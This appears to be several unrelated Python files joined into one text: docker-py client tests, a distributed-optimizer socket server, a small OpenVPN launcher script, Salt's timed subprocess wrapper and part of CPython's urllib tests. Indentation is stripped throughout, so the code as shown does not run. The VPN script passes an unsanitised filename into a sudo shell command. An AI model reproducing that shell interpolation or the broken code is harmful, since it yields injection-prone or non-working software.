def test_disconnect_container_from_network(self):
network_id = 'abc12345'
container_id = 'def45678'
post = mock.Mock(return_value=response(status_code=201))
with mock.patch('docker.Client.post', post):
self.client.disconnect_container_from_network(
{'Id': container_id}, network_id)
self.assertEqual(
post.call_args[0][0],
url_prefix + 'networks/{0}/disconnect'.format(network_id))
self.assertEqual(
json.loads(post.call_args[1]['data']),
{'container': container_id})
#######################
# PY SPECIFIC TESTS #
#######################
def test_load_config_no_file(self):
folder = tempfile.mkdtemp()
self.addCleanup(shutil.rmtree, folder)
cfg = docker.auth.load_config(folder)
self.assertTrue(cfg is not None)
def test_load_config(self):
folder = tempfile.mkdtemp()
self.addCleanup(shutil.rmtree, folder)
dockercfg_path = os.path.join(folder, '.dockercfg')
with open(dockercfg_path, 'w') as f:
auth_ = base64.b64encode(b'sakuya:izayoi').decode('ascii')
f.write('auth = {0}\n'.format(auth_))
f.write('email = sakuya@scarlet.net')
cfg = docker.auth.load_config(dockercfg_path)
self.assertTrue(docker.auth.INDEX_NAME in cfg)
self.assertNotEqual(cfg[docker.auth.INDEX_NAME], None)
cfg = cfg[docker.auth.INDEX_NAME]
self.assertEqual(cfg['username'], 'sakuya')
self.assertEqual(cfg['password'], 'izayoi')
self.assertEqual(cfg['email'], 'sakuya@scarlet.net')
self.assertEqual(cfg.get('auth'), None)
def test_load_config_with_random_name(self):
folder = tempfile.mkdtemp()
self.addCleanup(shutil.rmtree, folder)
dockercfg_path = os.path.join(folder,
'.{0}.dockercfg'.format(
random.randrange(100000)))
registry = 'https://your.private.registry.io'
auth_ = base64.b64encode(b'sakuya:izayoi').decode('ascii')
config = {
registry: {
'auth': '{0}'.format(auth_),
'email': 'sakuya@scarlet.net'
}
}
with open(dockercfg_path, 'w') as f:
f.write(json.dumps(config))
cfg = docker.auth.load_config(dockercfg_path)
self.assertTrue(registry in cfg)
self.assertNotEqual(cfg[registry], None)
cfg = cfg[registry]
self.assertEqual(cfg['username'], 'sakuya')
self.assertEqual(cfg['password'], 'izayoi')
self.assertEqual(cfg['email'], 'sakuya@scarlet.net')
self.assertEqual(cfg.get('auth'), None)
def test_tar_with_excludes(self):
dirs = [
'foo',
'foo/bar',
'bar',
]
files = [
'Dockerfile',
'Dockerfile.alt',
'.dockerignore',
'a.py',
'a.go',
'b.py',
'cde.py',
'foo/a.py',
'foo/b.py',
'foo/bar/a.py',
'bar/a.py',
]
exclude = [
'*.py',
'!b.py',
'!a.go',
'foo',
'Dockerfile*',
'.dockerignore',
]
expected_names = set([
'Dockerfile',
'.dockerignore',
'a.go',
'b.py',
'bar',
'bar/a.py',
])
base = make_tree(dirs, files)
self.addCleanup(shutil.rmtree, base)
with docker.utils.tar(base, exclude=exclude) as archive:
tar = tarfile.open(fileobj=archive)
assert sorted(tar.getnames()) == sorted(expected_names)
def test_tar_with_empty_directory(self):
base = tempfile.mkdtemp()
self.addCleanup(shutil.rmtree, base)
for d in ['foo', 'bar']:
os.makedirs(os.path.join(base, d))
with docker.utils.tar(base) as archive:
tar = tarfile.open(fileobj=archive)
self.assertEqual(sorted(tar.getnames()), ['bar', 'foo'])
def test_tar_with_file_symlinks(self):
base = tempfile.mkdtemp()
self.addCleanup(shutil.rmtree, base)
with open(os.path.join(base, 'foo'), 'w') as f:
f.write("content")
os.makedirs(os.path.join(base, 'bar'))
os.symlink('../foo', os.path.join(base, 'bar/foo'))
with docker.utils.tar(base) as archive:
tar = tarfile.open(fileobj=archive)
self.assertEqual(sorted(tar.getnames()), ['bar', 'bar/foo', 'foo'])
def test_tar_with_directory_symlinks(self):
base = tempfile.mkdtemp()
self.addCleanup(shutil.rmtree, base)
for d in ['foo', 'bar']:
os.makedirs(os.path.join(base, d))
os.symlink('../foo', os.path.join(base, 'bar/foo'))
with docker.utils.tar(base) as archive:
tar = tarfile.open(fileobj=archive)
self.assertEqual(sorted(tar.getnames()), ['bar', 'bar/foo', 'foo'])
#######################
# HOST CONFIG TESTS #
#######################
def test_create_host_config_secopt(self):
security_opt = ['apparmor:test_profile']
result = self.client.create_host_config(security_opt=security_opt)
self.assertIn('SecurityOpt', result)
self.assertEqual(result['SecurityOpt'], security_opt)
self.assertRaises(
docker.errors.DockerException, self.client.create_host_config,
security_opt='wrong'
)
class StreamTest(Cleanup, base.BaseTestCase):
def setUp(self):
socket_dir = tempfile.mkdtemp()
self.build_context = tempfile.mkdtemp()
self.addCleanup(shutil.rmtree, socket_dir)
self.addCleanup(shutil.rmtree, self.build_context)
self.socket_file = os.path.join(socket_dir, 'test_sock.sock')
self.server_socket = self._setup_socket()
self.stop_server = False
server_thread = threading.Thread(target=self.run_server)
server_thread.setDaemon(True)
server_thread.start()
self.response = None
self.request_handler = None
self.addCleanup(server_thread.join)
self.addCleanup(self.stop)
def stop(self):
self.stop_server = True
def _setup_socket(self):
server_sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
server_sock.bind(self.socket_file)
# Non-blocking mode so that we can shut the test down easily
server_sock.setblocking(0)
server_sock.listen(5)
return server_sock
def run_server(self):
try:
while not self.stop_server:
try:
connection, client_address = self.server_socket.accept()
except socket.error:
# Probably no connection to accept yet
time.sleep(0.01)
continue
connection.setblocking(1)
try:
self.request_handler(connection)
finally:
connection.close()
finally:
self.server_socket.close()
def early_response_sending_handler(self, connection):
data = b''
headers = None
connection.sendall(self.response)
while not headers:
data += connection.recv(2048)
parts = data.split(b'\r\n\r\n', 1)
if len(parts) == 2:
headers, data = parts
mo = re.search(r'Content-Length: ([0-9]+)', headers.decode())
assert mo
content_length = int(mo.group(1))
while True:
if len(data) >= content_length:
break
data += connection.recv(2048)
def test_early_stream_response(self):
self.request_handler = self.early_response_sending_handler
lines = []
for i in range(0, 50):
line = str(i).encode()
lines += [('%x' % len(line)).encode(), line]
lines.append(b'0')
lines.append(b'')
self.response = (
b'HTTP/1.1 200 OK\r\n'
b'Transfer-Encoding: chunked\r\n'
b'\r\n'
) + b'\r\n'.join(lines)
with docker.Client(base_url="http+unix://" + self.socket_file) \
as client:
for i in range(5):
try:
stream = client.build(
path=self.build_context,
stream=True
)
break
except requests.ConnectionError as e:
if i == 4:
raise e
self.assertEqual(list(stream), [
str(i).encode() for i in range(50)])
|
server.py
|
import os, sys, time
from typing import Dict, List, Union
import json
import logging
import socket
from _thread import start_new_thread
from threading import Lock
from multiprocessing import Pipe, Process, Queue, Manager
from multiprocessing.connection import Connection
# from queue import SimpleQueue
from dopt import Optimizer
from dopt.utils import process_commands_in_parallel
class Server:
def __init__(self,
optimizer: Optimizer,
config: Dict,
# initial_candidates: Union[None, List[Dict]] = None,
logging_level = logging.ERROR
) -> None:
"""Need docs on the config"""
self.optimizer = optimizer
self.process_list = []
self.config = config
self.trainers = Manager().dict()
self.trainer_id = 0
self.trainer_queue = Queue()
self.bad_candidate_queue = Queue()
# self.initial_candidates = initial_candidates \
# if isinstance(initial_candidates, list) else []
self.logging_level = logging_level
self.server_logger = self.init_log(stdout_level=self.logging_level)
# Locks for multiprocess or multithreaded access to resource
self.lock_trainers = Lock()
self.lock_trainer_queue = Lock()
self.lock_optimizer_conn = Lock()
self.lock_server_logger = Lock()
self.lock_bad_candidate_queue = Lock()
def run(self):
"""Starts 3 main Processes: One for the Optimizer, one for
starting trainers, one for connecting with trainers."""
# Runs the Optimizer
self.optimizer_conn, cconn = Pipe()
optimizer_process = Process(target=self.optimizer.run,
args=(cconn, self.server_logger, self.lock_server_logger))
optimizer_process.daemon = True
self.process_list.append(optimizer_process)
# Establish server connections, waits for trainers to connect
listen_trainers_process = Process(target=self.listen_trainers, args=())
listen_trainers_process.daemon = True
self.process_list.append(listen_trainers_process)
# Startup trainers on target remote machines
startup_process = Process(target=self.startup_trainers, args=())
startup_process.daemon = False # This process spawns children processes
self.process_list.append(startup_process)
# Start all processes
for p in self.process_list:
p.start()
while True:
with self.lock_server_logger:
with self.lock_trainers:
self.server_logger.debug(f"Number of Trainers running: {len(self.trainers)}")
with self.lock_trainer_queue:
self.server_logger.debug(f"Number of Trainers in the Queue: {self.trainer_queue.qsize()}")
if not self.trainer_queue.empty():
with self.lock_server_logger:
self.server_logger.debug("A Trainer is ready")
# Check which Trainer crashed, then push into a new Queue; if Trainer from
candidate = None
with self.lock_optimizer_conn:
with self.lock_bad_candidate_queue:
if not self.bad_candidate_queue.empty():
candidate = self._dequeue_bad_candidate()
elif self.optimizer_conn.poll(None): # There's a candidate available
message = self.optimizer_conn.recv()
message = json.loads(message)
candidate = message["candidate"]
if candidate != None:
connection, address, is_active, pending_candidate, trainer_id = self._dequeue_trainer()
self._send_candidate_to_trainer(candidate, connection, address)
with self.lock_trainers:
self.trainers[trainer_id] = [*self.trainers[trainer_id][:3], candidate]
with self.lock_trainers:
with self.lock_server_logger:
self.server_logger.debug(f"Trainers running: {json.dumps({trainer_id: self.trainers[trainer_id][1:] for trainer_id in list(self.trainers)})}, assigning {candidate} to {trainer_id}.")
else:
pass
if not optimizer_process.is_alive():
with self.lock_server_logger:
self.server_logger.debug("Optimizer stopped. Killing all processes.")
break
time.sleep(1)
self.terminate()
def terminate(self):
"""Kill all Processes"""
for p in self.process_list:
p.kill()
def _remove_pending_candidate(self, pending_candidate):
"""Tells the Optimizer to drop candidate off pending list"""
with self.lock_server_logger:
self.server_logger.warning(f"Removing candidate: {pending_candidate}")
with self.lock_optimizer_conn:
self.optimizer_conn.send(Optimizer.HEADER_REMOVE_CANDIDATE + \
json.dumps(pending_candidate)+'\n')
def _dequeue_bad_candidate(self):
with self.lock_bad_candidate_queue:
trainer = self.bad_candidate_queue.get() # Block until found one
return trainer
def _dequeue_trainer(self):
"""Dequeues one trainer from the queue, return trainer info."""
with self.lock_trainer_queue:
trainer_id = self.trainer_queue.get() # Block until found one
with self.lock_trainers:
if trainer_id not in self.trainers:
return self._dequeue_trainer()
pending_candidate = None
if len(self.trainers[trainer_id]) == 3:
connection, address, is_active = self.trainers[trainer_id]
elif len(self.trainers[trainer_id]) == 4:
connection, address, is_active, pending_candidate = self.trainers[trainer_id]
else:
raise Exception(f"self.trainers contains wrong things: {self.trainers[trainer_id]}")
if is_active == 0 and pending_candidate:
# Remove corrupted Trainer & dequeue again
self._remove_pending_candidate(pending_candidate)
self.trainers.pop(trainer_id)
self.__dequeue_trainer()
return connection, address, is_active, pending_candidate, trainer_id
def _send_candidate_to_trainer(self, candidate, connection, address):
"""Send a candidate safely to a Trainer on the queue"""
try:
connection.sendall(str.encode(
json.dumps({"candidate": candidate}) + "\n"
))
with self.lock_server_logger:
self.server_logger.debug(json.dumps({'candidate_sent':candidate, 'address':address}))
except Exception as e:
with self.lock_server_logger:
self.server_logger.exception(f"Problem with address: {address}")
def startup_trainers(self):
"""Runs on another Process. SSH into each machine in the list,
and start the Trainers with commands specified."""
commands = []
for host_cat in self.config["computer_list"]:
for host in self.config["computer_list"][host_cat]:
commands.append({
"host": host,
"command": self.config["commands"][host_cat]
})
with self.lock_server_logger:
self.server_logger.debug("Starting trainers..")
process_commands_in_parallel(commands)
def listen_trainers(self):
"""Runs on another Process. Spawns threads to handle communication
with Trainers."""
server = socket.socket()
host = '0.0.0.0'
port = self.config["server"]["port"]
try:
server.bind((host, port))
except socket.error as e:
with self.lock_server_logger:
self.server_logger.exception("Connection Error")
with self.lock_server_logger:
self.server_logger.debug('Waiting for a Connection..')
server.listen(5)
while True:
client, address = server.accept()
with self.lock_server_logger:
self.server_logger.debug('Connected to: ' + address[0] + ':' + str(address[1]))
start_new_thread(self.threaded_client_handling, (client, address,))
def threaded_client_handling(self, connection, address):
"""A thread handling the Trainers. Continually communicate
with the Trainers to gather real-time info on the Trainers."""
with self.lock_trainers:
# Quick fix for multiple Trainer instances running on same machine
if len(self.trainers) > 0:
for trainer_id in self.trainers.keys():
if address[0] == self.trainers[trainer_id][1][0]:
return
self.trainer_id += 1
self.trainers[self.trainer_id] = [connection, address, 1] # 1 means active
trainer_id = self.trainer_id
while True:
# Receive message from trainers
try:
responses = connection.recv(10000)
except Exception as e:
with self.lock_server_logger:
self.server_logger.exception("Can't receive response")
break
# If trainer exits
if not responses:
break
# Handle message received
reply = self._handle_client_response(responses, trainer_id, address)
# Reply back to trainers
try:
connection.sendall(str.encode(reply+'\n'))
except Exception as e:
with self.lock_server_logger:
self.server_logger.exception("Can't send reply")
break
# Delay response
time.sleep(0.5)
connection.close()
with self.lock_server_logger:
self.server_logger.warning(f"Closed connection with {address}")
with self.lock_trainers:
# Remove corrupted Trainer & dequeue again
if len(self.trainers[trainer_id]) == 4:
_, _, status, pending_candidate = self.trainers[trainer_id]
if status == 2:
# Candidate crashes when evaluated (twice in a row)
self._remove_pending_candidate(pending_candidate)
with self.lock_server_logger:
self.server_logger.error("Trainer crashes while evaluating candidate: " + \
f"{json.dumps(pending_candidate)}")
elif status == 1:
# Trainer crashed: Save candidate to try on a different Trainer
with self.lock_bad_candidate_queue:
self.bad_candidate_queue.put(pending_candidate)
elif len(self.trainers[trainer_id]) == 3:
with self.lock_server_logger:
self.server_logger.warning(f"Trainers running: {json.dumps({trainer_id: self.trainers[trainer_id][1:] for trainer_id in self.trainers.keys()})}, Current {trainer_id} has {self.trainers[trainer_id]}.")
else:
raise Exception(f"self.trainers contains wrong things: {self.trainers[trainer_id]}")
self.trainers.pop(trainer_id)
# self.trainers[trainer_id][3] = 0 # Trainer not active anymore
def _handle_client_response(self, responses, trainer_id, address):
"""Handles the response from the Trainers
:param response: Client response contains a dictionary with
following keys:
"gpu_info": Information on the machine GPU, CPU, etc.
"logging": Using print() on Trainer side will be channeled
into this to show up on Server side.
"observation": Only appears when an observation is made,
contains a dictionary with keys: "candidate", "result",
"info".
:param trainer_id: ID of a Trainer
:return: A reply to the Trainer
"""
responses = responses.decode("utf8")
logger = self.init_log(address=address, stdout_level=self.logging_level)
for response in responses.split("\n")[:-1]:
with self.lock_server_logger:
self.server_logger.debug(f"Loading response: {response}")
response = json.loads(response)
if "observation" in response:
with self.lock_optimizer_conn:
self.optimizer_conn.send(json.dumps(response["observation"])+'\n')
with self.lock_trainer_queue:
self.trainer_queue.put(trainer_id)
with self.lock_trainers:
self.trainers[trainer_id][2] = 1
with self.lock_server_logger:
self.server_logger.debug(json.dumps(response['observation']))
if "error" in response:
with self.lock_server_logger:
self.server_logger.error(f'{response["error"]}') #
if "gpu_info" in response:
with self.lock_server_logger:
self.server_logger.debug(json.dumps(response['gpu_info']))
# with self.lock_trainers:
# self.trainers[trainer_id][2] = response["gpu_info"] # For now
if "stack_info" in response:
# Log
stringReceived = logging.makeLogRecord(response)
logger.handle(stringReceived)
handlers = logger.handlers[:]
for handler in handlers:
handler.close()
logger.removeHandler(handler)
return json.dumps({"message": "candidate_sent"}) # Just an empty message
def init_log(self, address=None, stdout_level=logging.DEBUG):
logger = logging.getLogger("")
logger.setLevel(logging.DEBUG)
# create file handler that logs debug and higher level messages
filename = "logs_" + self.optimizer.filename.split(".")[0] + \
f"_{'client' if address else 'server'}.txt"
fh = logging.FileHandler(filename)
fh.setLevel(logging.DEBUG)
# create console handler with a higher log level
ch = logging.StreamHandler()
ch.setLevel(stdout_level)
# create formatter and add it to the handlers
name = json.dumps(address) if address else "server"
formatter = logging.Formatter(f'[{name} - %(asctime)s - %(levelname)s] %(message)s')
ch.setFormatter(formatter)
fh.setFormatter(formatter)
# add the handlers to logger
logger.addHandler(ch)
logger.addHandler(fh)
return logger
|
vpn.py
|
import os
import sys
import colorama
import threading
import webbrowser
import subprocess
import gh_md_to_html
import tkinter.messagebox
cwd = os.getcwd()
colorama.init(autoreset=True)
def run(command: str, *args, **kwargs):
return subprocess.run(command, shell=True) or True
def run_threaded(command: str, threaded=False):
try:
print(colorama.Fore.MAGENTA + command)
thread = threading.Thread(target=run, args=([command])).start()
return thread
except Exception as e:
tkinter.messagebox.showerror(title='Error!', message=e)
return False
def convert_and_show(doc: str):
html_code = gh_md_to_html.main(f'{cwd}/docs/{doc}.md', website_root=cwd, enable_css_saving=False)
html_path = f'{cwd}/docs/generated/{doc}.html'
open(html_path, 'w').write(html_code)
webbrowser.open(html_path)
def show_shop():
convert_and_show('shop')
def show_tutorial():
webbrowser.open(cwd + '/docs/shop.md')
def show_log():
webbrowser.open()
def vpns():
return [f for f in os.listdir('vpns') if f.endswith('.ovpn')]
def prompt_sudo():
return
ret = 0
if os.geteuid() != 0:
ret = run(f'sudo -v -p "[LixVPN] sudo-password for %u:"')
return ret
def start():
if not ('--no-sudo' in sys.argv or '--ns' in sys.argv):
prompt_sudo()
print(colorama.Fore.BLUE + 'LixVPN started.')
def close():
run('pkill -f "gui.py"')
run('sudo killall openvpn')
run('pkill -f "cli.py"')
def connect(to: str):
run(f'sudo openvpn --config vpns/{to} > logs/connection.log')
|
timed_subprocess.py
|
# -*- coding: utf-8 -*-
'''For running command line executables with a timeout'''
from __future__ import absolute_import
import subprocess
import threading
import salt.exceptions
from salt.ext import six
class TimedProc(object):
'''
Create a TimedProc object, calls subprocess.Popen with passed args and **kwargs
'''
def __init__(self, args, **kwargs):
self.wait = not kwargs.pop('bg', False)
self.stdin = kwargs.pop('stdin', None)
self.with_communicate = kwargs.pop('with_communicate', self.wait)
self.timeout = kwargs.pop('timeout', None)
# If you're not willing to wait for the process
# you can't define any stdin, stdout or stderr
if not self.wait:
self.stdin = kwargs['stdin'] = None
self.with_communicate = False
elif self.stdin is not None:
# Translate a newline submitted as '\n' on the CLI to an actual
# newline character.
self.stdin = self.stdin.replace('\\n', '\n')
kwargs['stdin'] = subprocess.PIPE
if not self.with_communicate:
self.stdout = kwargs['stdout'] = None
self.stderr = kwargs['stderr'] = None
if self.timeout and not isinstance(self.timeout, (int, float)):
raise salt.exceptions.TimedProcTimeoutError('Error: timeout {0} must be a number'.format(self.timeout))
try:
self.process = subprocess.Popen(args, **kwargs)
except TypeError:
str_args = []
for arg in args:
if not isinstance(arg, six.string_types):
str_args.append(str(arg))
else:
str_args.append(arg)
args = str_args
self.process = subprocess.Popen(args, **kwargs)
self.command = args
def run(self):
'''
wait for subprocess to terminate and return subprocess' return code.
If timeout is reached, throw TimedProcTimeoutError
'''
def receive():
if self.with_communicate:
self.stdout, self.stderr = self.process.communicate(input=self.stdin)
elif self.wait:
self.process.wait()
if not self.timeout:
receive()
else:
rt = threading.Thread(target=receive)
rt.start()
rt.join(self.timeout)
if rt.isAlive():
# Subprocess cleanup (best effort)
self.process.kill()
def terminate():
if rt.isAlive():
self.process.terminate()
threading.Timer(10, terminate).start()
raise salt.exceptions.TimedProcTimeoutError(
'{0} : Timed out after {1} seconds'.format(
self.command,
str(self.timeout),
)
)
return self.process.returncode
|
test_urllib.py
|
"""Regression tests for what was in Python 2's "urllib" module"""
import urllib.parse
import urllib.request
import urllib.error
import http.client
import email.message
import io
import unittest
from unittest.mock import patch
from test import support
import os
try:
import ssl
except ImportError:
ssl = None
import sys
import tempfile
from nturl2path import url2pathname, pathname2url
from base64 import b64encode
import collections
def hexescape(char):
"""Escape char as RFC 2396 specifies"""
hex_repr = hex(ord(char))[2:].upper()
if len(hex_repr) == 1:
hex_repr = "0%s" % hex_repr
return "%" + hex_repr
# Shortcut for testing FancyURLopener
_urlopener = None
def urlopen(url, data=None, proxies=None):
"""urlopen(url [, data]) -> open file-like object"""
global _urlopener
if proxies is not None:
opener = urllib.request.FancyURLopener(proxies=proxies)
elif not _urlopener:
opener = FancyURLopener()
_urlopener = opener
else:
opener = _urlopener
if data is None:
return opener.open(url)
else:
return opener.open(url, data)
def FancyURLopener():
with support.check_warnings(
('FancyURLopener style of invoking requests is deprecated.',
DeprecationWarning)):
return urllib.request.FancyURLopener()
def fakehttp(fakedata):
class FakeSocket(io.BytesIO):
io_refs = 1
def sendall(self, data):
FakeHTTPConnection.buf = data
def makefile(self, *args, **kwds):
self.io_refs += 1
return self
def read(self, amt=None):
if self.closed:
return b""
return io.BytesIO.read(self, amt)
def readline(self, length=None):
if self.closed:
return b""
return io.BytesIO.readline(self, length)
def close(self):
self.io_refs -= 1
if self.io_refs == 0:
io.BytesIO.close(self)
class FakeHTTPConnection(http.client.HTTPConnection):
# buffer to store data for verification in urlopen tests.
buf = None
def connect(self):
self.sock = FakeSocket(self.fakedata)
type(self).fakesock = self.sock
FakeHTTPConnection.fakedata = fakedata
return FakeHTTPConnection
class FakeHTTPMixin(object):
def fakehttp(self, fakedata):
self._connection_class = http.client.HTTPConnection
http.client.HTTPConnection = fakehttp(fakedata)
def unfakehttp(self):
http.client.HTTPConnection = self._connection_class
class FakeFTPMixin(object):
def fakeftp(self):
class FakeFtpWrapper(object):
def __init__(self, user, passwd, host, port, dirs, timeout=None,
persistent=True):
pass
def retrfile(self, file, type):
return io.BytesIO(), 0
def close(self):
pass
self._ftpwrapper_class = urllib.request.ftpwrapper
urllib.request.ftpwrapper = FakeFtpWrapper
def unfakeftp(self):
urllib.request.ftpwrapper = self._ftpwrapper_class
class urlopen_FileTests(unittest.TestCase):
"""Test urlopen() opening a temporary file.
Try to test as much functionality as possible so as to cut down on reliance
on connecting to the Net for testing.
"""
def setUp(self):
# Create a temp file to use for testing
self.text = bytes("test_urllib: %s\n" % self.__class__.__name__,
"ascii")
f = open(support.TESTFN, 'wb')
try:
f.write(self.text)
finally:
f.close()
self.pathname = support.TESTFN
self.returned_obj = urlopen("file:%s" % self.pathname)
def tearDown(self):
"""Shut down the open object"""
self.returned_obj.close()
os.remove(support.TESTFN)
def test_interface(self):
# Make sure object returned by urlopen() has the specified methods
for attr in ("read", "readline", "readlines", "fileno",
"close", "info", "geturl", "getcode", "__iter__"):
self.assertTrue(hasattr(self.returned_obj, attr),
"object returned by urlopen() lacks %s attribute" %
attr)
def test_read(self):
self.assertEqual(self.text, self.returned_obj.read())
def test_readline(self):
self.assertEqual(self.text, self.returned_obj.readline())
self.assertEqual(b'', self.returned_obj.readline(),
"calling readline() after exhausting the file did not"
" return an empty string")
def test_readlines(self):
lines_list = self.returned_obj.readlines()
self.assertEqual(len(lines_list), 1,
"readlines() returned the wrong number of lines")
self.assertEqual(lines_list[0], self.text,
"readlines() returned improper text")
def test_fileno(self):
file_num = self.returned_obj.fileno()
self.assertIsInstance(file_num, int, "fileno() did not return an int")
self.assertEqual(os.read(file_num, len(self.text)), self.text,
"Reading on the file descriptor returned by fileno() "
"did not return the expected text")
def test_close(self):
# Test close() by calling it here and then having it be called again
# by the tearDown() method for the test
self.returned_obj.close()
def test_info(self):
self.assertIsInstance(self.returned_obj.info(), email.message.Message)
def test_geturl(self):
self.assertEqual(self.returned_obj.geturl(), self.pathname)
def test_getcode(self):
self.assertIsNone(self.returned_obj.getcode())
def test_iter(self):
# Test iterator
# Don't need to count number of iterations since test would fail the
# instant it returned anything beyond the first line from the
# comparison.
# Use the iterator in the usual implicit way to test for ticket #4608.
for line in self.returned_obj:
self.assertEqual(line, self.text)
def test_relativelocalfile(self):
self.assertRaises(ValueError,urllib.request.urlopen,'./' + self.pathname)
class ProxyTests(unittest.TestCase):
def setUp(self):
# Records changes to env vars
self.env = support.EnvironmentVarGuard()
# Delete all proxy related env vars
for k in list(os.environ):
if 'proxy' in k.lower():
self.env.unset(k)
def tearDown(self):
# Restore all proxy related env vars
self.env.__exit__()
del self.env
def test_getproxies_environment_keep_no_proxies(self):
self.env.set('NO_PROXY', 'localhost')
proxies = urllib.request.getproxies_environment()
# getproxies_environment use lowered case truncated (no '_proxy') keys
self.assertEqual('localhost', proxies['no'])
# List of no_proxies with space.
self.env.set('NO_PROXY', 'localhost, anotherdomain.com, newdomain.com:1234')
self.assertTrue(urllib.request.proxy_bypass_environment('anotherdomain.com'))
self.assertTrue(urllib.request.proxy_bypass_environment('anotherdomain.com:8888'))
self.assertTrue(urllib.request.proxy_bypass_environment('newdomain.com:1234'))
def test_proxy_cgi_ignore(self):
try:
self.env.set('HTTP_PROXY', 'http://somewhere:3128')
proxies = urllib.request.getproxies_environment()
self.assertEqual('http://somewhere:3128', proxies['http'])
self.env.set('REQUEST_METHOD', 'GET')
proxies = urllib.request.getproxies_environment()
self.assertNotIn('http', proxies)
finally:
self.env.unset('REQUEST_METHOD')
self.env.unset('HTTP_PROXY')
def test_proxy_bypass_environment_host_match(self):
bypass = urllib.request.proxy_bypass_environment
self.env.set('NO_PROXY',
'localhost, anotherdomain.com, newdomain.com:1234, .d.o.t')
self.assertTrue(bypass('localhost'))
self.assertTrue(bypass('LocalHost')) # MixedCase
self.assertTrue(bypass('LOCALHOST')) # UPPERCASE
self.assertTrue(bypass('newdomain.com:1234'))
self.assertTrue(bypass('foo.d.o.t')) # issue 29142
self.assertTrue(bypass('anotherdomain.com:8888'))
self.assertTrue(bypass('www.newdomain.com:1234'))
self.assertFalse(bypass('prelocalhost'))
self.assertFalse(bypass('newdomain.com')) # no port
self.assertFalse(bypass('newdomain.com:1235')) # wrong port
class ProxyTests_withOrderedEnv(unittest.TestCase):
def setUp(self):
# We need to test conditions, where variable order _is_ significant
self._saved_env = os.environ
# Monkey patch os.environ, start with empty fake environment
os.environ = collections.OrderedDict()
def tearDown(self):
os.environ = self._saved_env
def test_getproxies_environment_prefer_lowercase(self):
# Test lowercase preference with removal
os.environ['no_proxy'] = ''
os.environ['No_Proxy'] = 'localhost'
self.assertFalse(urllib.request.proxy_bypass_environment('localhost'))
self.assertFalse(urllib.request.proxy_bypass_environment('arbitrary'))
os.environ['http_proxy'] = ''
os.environ['HTTP_PROXY'] = 'http://somewhere:3128'
proxies = urllib.request.getproxies_environment()
self.assertEqual({}, proxies)
# Test lowercase preference of proxy bypass and correct matching including ports
os.environ['no_proxy'] = 'localhost, noproxy.com, my.proxy:1234'
os.environ['No_Proxy'] = 'xyz.com'
self.assertTrue(urllib.request.proxy_bypass_environment('localhost'))
self.assertTrue(urllib.request.proxy_bypass_environment('noproxy.com:5678'))
self.assertTrue(urllib.request.proxy_bypass_environment('my.proxy:1234'))
self.assertFalse(urllib.request.proxy_bypass_environment('my.proxy'))
self.assertFalse(urllib.request.proxy_bypass_environment('arbitrary'))
# Test lowercase preference with replacement
os.environ['http_proxy'] = 'http://somewhere:3128'
os.environ['Http_Proxy'] = 'http://somewhereelse:3128'
proxies = urllib.request.getproxies_environment()
self.assertEqual('http://somewhere:3128', proxies['http'])
class urlopen_HttpTests(unittest.TestCase, FakeHTTPMixin, FakeFTPMixin):
"""Test urlopen() opening a fake http connection."""
def check_read(self, ver):
self.fakehttp(b"HTTP/" + ver + b" 200 OK\r\n\r\nHello!")
try:
fp = urlopen("http://python.org/")
self.assertEqual(fp.readline(), b"Hello!")
self.assertEqual(fp.readline(), b"")
self.assertEqual(fp.geturl(), 'http://python.org/')
self.assertEqual(fp.getcode(), 200)
finally:
self.unfakehttp()
def test_url_fragment(self):
# Issue #11703: geturl() omits fragments in the original URL.
url = 'http://docs.python.org/library/urllib.html#OK'
self.fakehttp(b"HTTP/1.1 200 OK\r\n\r\nHello!")
try:
fp = urllib.request.urlopen(url)
self.assertEqual(fp.geturl(), url)
finally:
self.unfakehttp()
def test_willclose(self):
self.fakehttp(b"HTTP/1.1 200 OK\r\n\r\nHello!")
try:
resp = urlopen("http://www.python.org")
self.assertTrue(resp.fp.will_close)
finally:
self.unfakehttp()
def test_read_0_9(self):
# "0.9" response accepted (but not "simple responses" without
# a status line)
self.check_read(b"0.9")
def test_read_1_0(self):
self.check_read(b"1.0")
def test_read_1_1(self):
self.check_read(b"1.1")
def test_read_bogus(self):
# urlopen() should raise OSError for many error codes.
self.fakehttp(b'''HTTP/1.1 401 Authentication Required
Date: Wed, 02 Jan 2008 03:03:54 GMT
Server: Apache/1.3.33 (Debian GNU/Linux) mod_ssl/2.8.22 OpenSSL/0.9.7e
Connection: close
Content-Type: text/html; charset=iso-8859-1
''')
try:
self.assertRaises(OSError, urlopen, "http://python.org/")
finally:
self.unfakehttp()
def test_invalid_redirect(self):
# urlopen() should raise OSError for many error codes.
self.fakehttp(b'''HTTP/1.1 302 Found
Date: Wed, 02 Jan 2008 03:03:54 GMT
Server: Apache/1.3.33 (Debian GNU/Linux) mod_ssl/2.8.22 OpenSSL/0.9.7e
Location: file://guidocomputer.athome.com:/python/license
Connection: close
Content-Type: text/html; charset=iso-8859-1
''')
try:
msg = "Redirection to url 'file:"
with self.assertRaisesRegex(urllib.error.HTTPError, msg):
urlopen("http://python.org/")
finally:
self.unfakehttp()
def test_redirect_limit_independent(self):
# Ticket #12923: make sure independent requests each use their
# own retry limit.
for i in range(FancyURLopener().maxtries):
self.fakehttp(b'''HTTP/1.1 302 Found
Location: file://guidocomputer.athome.com:/python/license
Connection: close
''')
try:
self.assertRaises(urllib.error.HTTPError, urlopen,
"http://something")
finally:
self.unfakehttp()
def test_empty_socket(self):
# urlopen() raises OSError if the underlying socket does not send any
# data. (#1680230)
self.fakehttp(b'')
try:
self.assertRaises(OSError, urlopen, "http://something")
finally:
self.unfakehttp()
def test_missing_localfile(self):
# Test for #10836
with self.assertRaises(urllib.error.URLError) as e:
urlopen('file://localhost/a/file/which/doesnot/exists.py')
self.assertTrue(e.exception.filename)
self.assertTrue(e.exception.reason)
def test_file_notexists(self):
fd, tmp_file = tempfile.mkstemp()
tmp_fileurl = 'file://localhost/' + tmp_file.replace(os.path.sep, '/')
try:
self.assertTrue(os.path.exists(tmp_file))
with urlopen(tmp_fileurl) as fobj:
self.assertTrue(fobj)
finally:
os.close(fd)
os.unlink(tmp_file)
self.assertFalse(os.path.exists(tmp_file))
with self.assertRaises(urllib.error.URLError):
urlopen(tmp_fileurl)
def test_ftp_nohost(self):
test_ftp_url = 'ftp:///path'
with self.assertRaises(urllib.error.URLError) as e:
urlopen(test_ftp_url)
self.assertFalse(e.exception.filename)
self.assertTrue(e.exception.reason)
def test_ftp_nonexisting(self):
with self.assertRaises(urllib.error.URLError) as e:
